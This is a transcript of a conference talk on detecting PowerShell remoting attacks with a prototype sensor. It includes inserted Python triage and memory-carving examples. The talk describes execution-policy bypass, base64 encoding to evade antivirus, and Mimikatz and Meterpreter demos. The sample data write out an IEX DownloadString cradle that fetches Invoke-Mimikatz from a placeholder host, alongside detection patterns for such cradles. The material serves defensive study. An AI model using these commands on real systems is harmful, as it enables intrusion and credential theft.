Pornsook Kornkitichai – Defend PowerShell Attacks When All Else Fails

Hello everyone, my name is Pornsook Kornkitichai. I come from Thailand, and today I'm going to talk about how to defend against PowerShell attacks when every other defense fails. But before going further I would like to introduce myself a bit more. I'm working as a senior manager and lead of the security assessment team at a scene for tech Thailand, and basically my everyday tasks are mostly about pen testing or some kind of IT security consulting. My research interest is offensive security, and sometimes defensive security and cyber warfare.

Now, the topics that I'm going to cover today. There are several. First I'm going to talk about PowerShell and its offensive side. Next is why our defenses against PowerShell attacks fail. Next I'm going to talk about how and why it is quite difficult to implement something to defend PowerShell. Then I'm going to introduce the prototype I wrote to defend against those attacks, and then I'm going to do some demonstrations.

Basically, if you have ever used PowerShell before, you might have the question: why is there PowerShell in the new versions of Windows? I'm going to talk a little bit about PowerShell. In the old days in Windows we had just cmd, but some time later Microsoft wanted some kind of powerful command line like the shell in Linux. As you know, it's a different platform: Linux is a file-based platform, but Windows is API and object based, so they could not implement a shell that looks like the shell in Linux. So they created PowerShell and built other things on top of it. But since the 2010s there have been lots of works and research related to the offensive side of PowerShell. I'm quite certain that a lot of people here have seen this list of offensive PowerShell modules before, but I would like to give you a quick overview of each module. The first one is PowerSploit.
PowerSploit is a collection of post-exploitation PowerShell modules. If you are a pen tester you can use it to bypass antivirus, to invoke some shellcode or DLL injection, or you can use it to do some data exfiltration. Another framework is Nishang. Nishang is a collection of PowerShell scripts and payloads, all for offensive security. Next is PowerView. If you have ever heard of the Veil framework before, this module is from the same author. The idea of PowerView is for when a pen tester would like to enumerate the environment but that environment has the net command disabled, so the author of PowerView created some modules to mimic the behavior of the net command. For example, you can use Get-NetUser or Get-NetGroup instead of net user or net group. Next is PowerUp, one part of PowerTools. PowerUp is used for local privilege escalation. Another framework is Powercat. Powercat is netcat, but implemented in PowerShell. Next is the payload called Interactive PowerShell in Metasploit. If you have used Metasploit before: if you launch a shell and then type powershell.exe, your session will freeze, because you cannot have an interactive session with PowerShell that way.

So in this case there's a payload called Interactive PowerShell that you can use to get an interactive PowerShell on the target system that you attack. And the latest work is PowerShell Empire, published at BSides Las Vegas this year. Basically the idea is to create some kind of PowerShell agent and send it to the target system; when the target runs the PowerShell agent it connects back to your command and control, and then you can do anything you want with PowerShell, for example shellcode injection or DLL injection or anything else you want. It looks like the Metasploit framework, but it's PowerShell. So these are just some examples of offensive security modules for PowerShell.

Next I'm going to talk about why all defenses for PowerShell fail to stop the attacks. The first one is the first line of defense, maybe you have heard of this before: the execution policy. If you are new to PowerShell: as a normal user you cannot run PowerShell scripts. As you can see from the screenshot, you cannot run the PowerShell script; the PowerShell script format is .ps1. One thing that you can do is just type the commands on the console, or just copy the PowerShell script, paste it into the console and run it. That's the way you can do it. And if you know how the execution policy works you can bypass it. Normally there are five options for the execution policy: one is Restricted, which is the default setting; the second is AllSigned; the third is RemoteSigned; the fourth is Bypass; and the fifth is Unrestricted. If you just change the option to Bypass you can do anything. Well, the main purpose of this execution policy is to prevent the user from running PowerShell scripts, and intentionally it is not designed to defend against attacks, so it's not a defense. Another technique to bypass the execution policy is base64-encoded commands. For example, if you have a PowerShell script you just encode it to base64, paste it into the PowerShell command console and run it, and you can bypass it. Another thing about encoded commands: when you download or use some PowerShell script to attack a system, some antivirus can detect it; you can use encoded commands to hide yourself. But there's a limitation in Windows XP and newer versions, because the length of the console command line is limited to around eight thousand one hundred and something characters. If you have a very long PowerShell script you need to do some compression and then decompress it in memory. Some people in the offensive community wrote a module to do this for you, so that's not a problem.

Another protection mechanism is AppLocker. AppLocker was introduced with Windows 7 and Windows 2008 R2, but you can use it only on the Enterprise and Ultimate editions. The purpose of AppLocker is to allow administrators to lock down the system to prevent running any unauthorized applications. You might have heard about Software Restriction Policy; it's the same thing, but it is the older technique, the older system. Why is it older? Because when you set up Software Restriction Policy rules you cannot apply them to each user or each group, and it's quite difficult to manage. But if you enable AppLocker and Software Restriction Policy at the same time, your machine will use only the AppLocker rules. When you apply AppLocker to prevent PowerShell, you can use it to block executable files or just PowerShell script files. Let's see: if you set the rule here with powershell.exe and powershell_ise.exe restricted, you cannot run them. Next, you can use it to prevent running PowerShell script files. But as you know this is a setting made by administrators; if the attacker can gain access at the privileged level of the system, this protection mechanism is useless.

Now moving to PowerShell remoting. PowerShell remoting means that you run PowerShell and would like to execute on a remote machine; we call this PowerShell remoting. When you use PowerShell remoting you connect to the default remote session configuration. You can find the configuration on your machine with this command: Get-PSSessionConfiguration. It will list all settings of the remote endpoints. But in newer versions of PowerShell, from PowerShell v3 and later, you can enable a constrained PowerShell endpoint. What does that mean? It means that you can limit the number of commands that the remote session can use. For example, I connect to the machine called Windows 8.1 something and try to list the commands, and what I get back is fewer than 10 commands that I can use. Normally there are many hundreds of commands in the PowerShell console. So if you want to apply this inside your enterprise organization you could do it, but, the same as AppLocker, if an attacker can get access at the admin level, constrained PowerShell doesn't help.

Next is the PowerShell lockdown policy. There's not much information related to it; there are just two links. The thing is, you can use an environment variable: by creating a variable called __PSLockdownPolicy and setting its value, your PowerShell console will change into a mode called Constrained Language mode. What this means is that you can use commands, you can just run cmdlets in PowerShell, but you cannot access any type of .NET object; you cannot access classes, you cannot access instances, because it is in Constrained Language mode. But the same assumption applies: attackers know about this very well; they can delete the variable and bypass this easily.

So what is my work about? My work is based on these assumptions. First, the attacker can gain access to a privileged account; for example, they can gain access to the local administrator of the target system, or to one account of the Domain Admins group. The second assumption is that they can enable PowerShell remoting. Third, all of the protections I mentioned earlier, attackers know them very well. And fourth, I don't talk about event logs, because the attacker can disable them.
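Since the execution policy, AppLocker and the lockdown variable are all sidestepped by a pasted or encoded command, the defender's first practical check is to decode what actually ran. The Python triage below over constructed process-creation records is an added example, not code from the talk or from the speaker's prototype; the log format, the parent-image names and the 192.0.2.10 address are my assumptions.

```python
import base64
import re

# Constructed sample: the kind of one-liner an attacker pastes to dodge the
# execution policy and AV signatures. Built here so the base64 is correct;
# 192.0.2.10 is a documentation address, not a real host.
PAYLOAD = ("IEX (New-Object Net.WebClient).DownloadString("
           "'http://192.0.2.10/Invoke-Mimikatz.ps1'); Invoke-Mimikatz")
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed process-creation records (what a 4688/Sysmon-style log gives you).
SAMPLE_LOG = [
    'ParentImage=winword.exe CommandLine="powershell -nop -w hidden -enc ' + ENCODED + '"',
    'ParentImage=explorer.exe CommandLine="powershell.exe -ExecutionPolicy Bypass -File C:\\tools\\audit.ps1"',
    'ParentImage=wsmprovhost.exe CommandLine="cmd.exe /c whoami"',
    'ParentImage=explorer.exe CommandLine="powershell.exe Get-Process"',
]

# PowerShell accepts any unambiguous prefix: -e, -ec, -enc, -EncodedCommand.
ENC_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
POLICY_RE = re.compile(r"-e[px]\w*\s+(bypass|unrestricted)", re.I)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries UTF-16LE text, not UTF-8; decode accordingly."""
    return base64.b64decode(b64).decode("utf-16-le")


def triage(record: str) -> dict:
    """Return the indicators found in one process-creation record."""
    cmd_m = re.search(r'CommandLine="([^"]*)"', record)
    par_m = re.search(r"ParentImage=(\S+)", record)
    cmdline = cmd_m.group(1) if cmd_m else ""
    parent = par_m.group(1).lower() if par_m else ""
    visible = cmdline                      # text we can actually read
    enc = ENC_RE.search(cmdline)
    if enc:
        try:
            visible = cmdline + " " + decode_encoded_command(enc.group(1))
        except (ValueError, UnicodeDecodeError):
            pass                           # malformed blob: keep the raw line
    cradle = (re.search(r"\biex\b|invoke-expression", visible, re.I) is not None
              and re.search(r"download(string|file)|webclient|invoke-webrequest",
                            visible, re.I) is not None)
    ind = {
        "encoded": enc is not None,
        "policy_bypass": POLICY_RE.search(cmdline) is not None,
        "download_cradle": cradle,
        "spawned_by_remoting": parent == "wsmprovhost.exe",
        "office_parent": parent in ("winword.exe", "excel.exe", "powerpnt.exe"),
        "decoded": visible if enc else None,
    }
    ind["score"] = sum(1 for k in ("encoded", "policy_bypass", "download_cradle",
                                   "spawned_by_remoting", "office_parent") if ind[k])
    return ind


def scan(records):
    """All records with at least one indicator, highest score first."""
    hits = [(triage(r), r) for r in records]
    return sorted([h for h in hits if h[0]["score"] > 0],
                  key=lambda h: h[0]["score"], reverse=True)
```

Note that a child of wsmprovhost.exe is flagged on its own, because that parent is exactly the remoting host the rest of the talk deals with.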

That's it. Next, why is defense against PowerShell attacks difficult? Some of you might think: why don't we do some hooking, or just intercept Win32 API functions? I did it, but it's quite difficult. Let's see the screenshot above. If you call local PowerShell there will be a powershell.exe process here, and then if you do some stack tracing or monitoring of the stack trace, you will see that there is no proper point to do hooking or interception. What you can see is .NET. For people who are very new to PowerShell: PowerShell is implemented entirely with .NET objects, classes and instances, so there's no point to intercept the Win32 API for PowerShell remoting.

Then you might think: why don't we do some kind of interception and analyze the traffic for malicious traffic? I did it; the same result. Basically, when we use PowerShell remoting, PowerShell uses a protocol called WS-Man, the Windows Remote Management protocol. It runs on HTTP and HTTPS, on port 5985 for HTTP and 5986 for HTTPS. But when you use HTTP, the HTTP content is encrypted; you can see only the HTTP header, which does not give you much information; you can see just that it is encrypted with something. When you use PowerShell remoting inside a domain environment it is encrypted with Kerberos, but if you use it in a workgroup it is encrypted with CredSSP. You cannot do any man-in-the-middle. And with HTTPS, all HTTP headers and content are encrypted twice, so it's very difficult to do some man-in-the-middle here and do analysis on malicious traffic. But this year Microsoft published some very nice tools. Basically, if you do traffic or network sniffing you use Wireshark or tcpdump, but Microsoft has a new tool called Microsoft Message Analyzer; you can watch granular details of the methods in each event or protocol that Windows uses. When I ran Microsoft Message Analyzer while I used PowerShell remoting, I could see everything; you can just see here everything inside the message, because PowerShell remoting uses web services. You can see some plain text messages, plain text communication, and you can analyze it. But it's impractical to apply this to each and every workstation in the organization, because it utilizes too much network and workstation resources. So this is why it's quite difficult.

Last year there was a paper, a well-known paper in the PowerShell community, "Investigating PowerShell Attacks", published at DEF CON 2014 and Black Hat the same year. The paper tried to find information about how to locate evidence from memory and from event logs when there is a PowerShell attack. I will give you some recap before going further, because it is related to my work; this paper influenced my platform as well. When you do PowerShell remoting, when you type the command line on your PowerShell console, your command line inside your machine is a .NET class and object. It will be serialized and then sent to the target system, the target workstation, over the WS-Man protocol. When that communication is received by the dispatcher on the target system, it will look at which application has been registered with the dispatcher; it will consider whether it is PowerShell or not, and if it is PowerShell it will send it to wsmprovhost.exe. This is the target machine: when it receives some remote command, and if the remote command spawns any other executable files, it will spawn another process. This paper said that if you want to see some PowerShell commands, if you want to see some important remnants in memory, you need to do memory analysis against wsmprovhost.exe. But the problem is that wsmprovhost.exe terminates itself immediately after the end of the session; that's why it's very difficult to do real-time analysis on the memory of wsmprovhost.exe.

So from the assumptions, from the limitations and from the latest study, I am going to propose the prototype called PowerShift. You can implement it or copy my idea and apply it to some workstations in your organization, or just apply it to some honeynet machines. The idea is divided into three components. The first one is C2, command and control; it behaves like a central log: it receives and sends commands and receives events from the agent, the sensor. The second is a client; I call it the sensor, and in my experiment I did it on Windows 7 and Windows 8.1 with Windows PowerShell v2, v3 and v4. The internal components of the sensor are three: two adapters and one sensor. First is the PowerShell adapter, next is the fake wsmprovhost adapter, and then the sensor. The sensor is the one that needs to communicate with the C2. You can see number 4 above: files or commands from the C2; number 5 is traffic or event information from the sensor; it is encrypted with AES encryption.

So I'm going to solve the problem of wsmprovhost.exe. You can see that in the path C:\Windows\System32, where wsmprovhost.exe is located, you might notice that there are two wsmprovhost.exe. The real one, present on every machine since Windows 7, I renamed to wsmprovhost1.exe; you can rename it to anything you want, you just change the configuration file in the prototype. And the fake one, I mean my adapter, is the fake wsmprovhost.exe. So next time there is PowerShell remoting, it will be directed to your adapter. A prerequisite: the owner of wsmprovhost.exe and powershell.exe is not a user, not your own user; it is TrustedInstaller. If you rename it you need to change the owner, and after you rename it you need to change the owner back. This is a prerequisite. Now, what I'm going to intercept: I'm going to intercept some Win32 APIs to locate some important information. I try to intercept

two processes in the initial step. The first one is ExitProcess. As I mentioned, the problem is that it terminates very quickly and you cannot do anything with it, so I hook ExitProcess because I need to buy some time and then do some memory analysis before it terminates itself. Then I hook CreateProcess, because I would like to know if the attacker spawns some other executable files. And next is the Winsock (ws2_32) data, because what I want is to monitor some network traffic, since malicious PowerShell modules often download things from the network. OK, this is what I'm going to try to find inside the memory. In the paper "Investigating PowerShell Attacks" they tried to do memory analysis and find the patterns of the commands, numbers 2 to 5, but from my experiment number 1 is very important too, because it contains some previous commands that the attacker used.

OK, let's see some demonstrations. I have three demonstrations of the tool, two of them by video. The reason is that I need to change the environment, to turn on and turn off some PowerShell and OS versions, and that takes some time, so I will show video demonstrations for two and a live one for the other. OK, the first demonstration is a series of remote PowerShell commands; Windows 7 is the client. Let's see: this is the C2, I run it on my Mac; you will see later this is the dashboard I built with a web interface. Now I'm going to run the sensor. OK, the sensor started. Next I switch to Windows 2008 to do some PowerShell remoting. Windows 7 has PowerShell v3 and Windows 2008 has PowerShell v2. I try to do some remoting with Enter-PSSession, Kerberos-encrypted because it's inside a domain, and I use a series of commands: Get-Host, Get-PSSession, Get-Process, and some with pipelines. OK, next I have terminated that session and then I'm going back to the client console. I'm going to pause here: you can see there is a hook happening after the session terminates. When the hook works it hooks into ExitProcess, because I would like to do some real-time memory analysis, but the result of the memory analysis at this point depends on what is inside the memory. Sometimes I get important clues,

sometimes I get nothing; it depends. Now back to the dashboard. You can see there are some logs here; you can see some commands, but not one hundred percent, because I just got some remnants of the memory at that time. If you Enter-PSSession for a long time, maybe you can get only thirty percent, because I just hook into ExitProcess only.

Next I'm going to do some live demonstration. OK, first I'm going to run my HTTP server, because I put some malicious PowerShell scripts there; then I'm going to run the C2. OK, the C2 works. Going to Windows 8.1, this is a client, and I will run the sensor; you can notice that it runs under administrative privilege. Back to Windows 2012. I'm going to use Invoke-Command. Invoke-Command means that we want to run the command remotely on the target machine. I want to invoke the command on the computer named WIN81 with the command inside the script block here: I use IEX, meaning that we want to download some script, and that script is Invoke-Mimikatz.ps1 from this IP address, which is my Mac machine, and then run Invoke-Mimikatz. So let's see. OK, so what about the demonstration... I'm not sure what the problem is here. Because I have only five minutes left, I'm going to show you my video demonstration instead; it's the same. OK, I start the sensor on Windows 8.1 now,
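The memory-remnant step described above (carving PowerShell command text out of wsmprovhost.exe before it exits) can be practised offline on a dump. The Python carver below is an added example, not the speaker's sensor or the paper's patterns; the memory bytes are constructed inline, and the "looks like PowerShell" heuristics are my own assumption.

```python
import re

# Constructed stand-in for a region of wsmprovhost.exe memory. .NET keeps
# strings as UTF-16LE, so command remnants sit between unrelated bytes as
# <char>\x00 pairs. No real process was dumped for this; 192.0.2.10 and
# WIN81 are placeholder values.
def _u16(s: str) -> bytes:
    return s.encode("utf-16-le")


SAMPLE_MEMORY = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04"
    + _u16("Get-Process | Where-Object { $_.Name -like 'lsa*' }")
    + bytes(range(48))
    + _u16("System.Management.Automation")
    + b"\xff\xfe\x00"
    + _u16("Invoke-Command -ComputerName WIN81 -ScriptBlock { IEX (New-Object "
           "Net.WebClient).DownloadString('http://192.0.2.10/s.ps1') }")
    + b"\x00" * 16
    + b"plain ASCII without nulls is ignored"
    + _u16("Enter-PSSession -ComputerName WIN81")
)

# A run of 8+ printable ASCII characters encoded as UTF-16LE.
PRINTABLE_U16 = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")

# Cheap "looks like PowerShell" hints: Verb-Noun cmdlets, a pipeline, $_, IEX.
PS_HINTS = [
    re.compile(r"\b[A-Z][a-z]+-[A-Z][A-Za-z]+\b"),
    re.compile(r"\|\s*[A-Za-z$]"),
    re.compile(r"\$_\b"),
    re.compile(r"\bIEX\b|Invoke-Expression", re.I),
]


def carve_utf16(buf: bytes):
    """Yield (offset, text) for every printable UTF-16LE run in buf."""
    for m in PRINTABLE_U16.finditer(buf):
        yield m.start(), m.group().decode("utf-16-le")


def looks_like_powershell(text: str) -> bool:
    return any(h.search(text) for h in PS_HINTS)


def carve_remnants(buf: bytes):
    """Return [(offset, text, is_powershell)] for all carved strings."""
    return [(off, txt, looks_like_powershell(txt)) for off, txt in carve_utf16(buf)]


def powershell_remnants(buf: bytes):
    """Only the strings worth forwarding to a C2 dashboard as command evidence."""
    return [txt for _, txt, ps in carve_remnants(buf) if ps]
```

On a real dump the carved text is partial, as the talk says, so the hints are deliberately loose; tighten them against your own false positives.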

I'm going back to Windows 2012 again and then use Invoke-Command with Invoke-Mimikatz to try to locate some plaintext credentials. But as you know, if you run it on Windows 2012 R2 you cannot see anything important. Invoke-Command finished, and then back to Windows 8.1 again: you can see there is a hooking and a capturing here. Capturing means that if there is some downloading from the internet, from the network, it will capture something and send it to the C2. Now the hooking finished. Back to the dashboard again; now you can see that there is a file that the PowerShell remoting from Invoke-Command downloaded from the network, and it's a PowerShell script. If you use a general protection mechanism you cannot see it, because it's encrypted; you need to do some brutal memory analysis only.

And the last one: I show you a remote demonstration, but this one is not PowerShell remoting, it's a macro attack. I used the script from this URL. Let's see what it looks like. I start a multi/handler to listen for Meterpreter to call back, now back to the Windows client, and imagine that this is a user trying to open some macro: enable macro, and then everything seems to be OK, and then back to Kali, and Meterpreter calls back. This macro uses malicious PowerShell inside. Now back to our dashboard: you can see there is the complete PowerShell call from that macro.

The final thing that I would like to remind you is that PowerShell is not powershell.exe or powershell_ise.exe; these two are just the host applications inside your Windows system. If the attacker can write a .NET application themselves, they can create malware that directly accesses the .NET object classes and instances and everything inside your Windows environment, which my product cannot detect at all. But if you think about it another way: if they can run a .NET application on your machine, they don't need to use PowerShell; they can do anything, right? And yes, this is just a host application. This is the limitation of my work. There is some related work talking about Windows host applications; you can learn from this list.

And last but not least is PowerShell v5. This is greatly improved from v2, v3 and v4, because there is a feature called the Antimalware Scan Interface. This is very nice because, if you remember, I tried to intercept some Win32 APIs, but this time some guys from Microsoft opened an API to you, and with this API antivirus and other security companies can use these interfaces to locate and find any evidence that identifies which is malicious and which is not, without hooking. So lots of offensive PowerShell modules don't work on PowerShell v5 in Windows 10 right now. And if you have any questions, just ask me here; if you would like to talk more about the platform, I'm going to be around here tomorrow. That's it. Thank you for attending the last session for today, thank you very much.